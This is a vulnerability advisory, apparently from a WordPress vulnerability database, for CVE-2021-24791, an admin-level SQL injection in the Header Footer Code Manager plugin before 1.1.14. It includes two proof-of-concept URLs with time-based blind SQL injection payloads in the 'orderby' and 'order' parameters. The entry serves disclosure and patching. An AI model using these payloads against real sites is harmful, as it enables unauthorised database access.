Header Footer Code Manager < 1.1.14 – Admin+ SQL Injections | CVE 2021-24791 | Plugin Vulnerabilities

Description

The plugin does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections

Proof of Concept

https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%2810%29%29%29uWCv%29&order=DESC

https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=name&order=+AND+%28SELECT+9933+FROM+%28SELECT%28SLEEP%2810%29%29%29wbfm%29

Affects Plugins

header-footer-code-manager

Fixed in 1.1.14

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID

d55caa9b-d50f-4c13-bc69-dc475641735f

Timeline

Publicly Published

2021-10-11 (about 4 years ago)

Added

2021-10-11 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2014-08-01

Title

Ajax Gallery <= 3.0 - SQL Injection

Published

2024-04-25

Title

XStore < 9.3.9 - Unauthenticated SQLi

Published

2025-03-31

Title

Next-Cart Store to WooCommerce Migration < 3.9.5 - Unauthenticated SQL Injection

Published

2025-02-23

Title

WP Yelp Review Slider < 8.2 - Authenticated (Administrator+) SQL Injection

Published

2023-01-20

Title

FL3R FeelBox <= 8.1 - Unauthenticated SQLi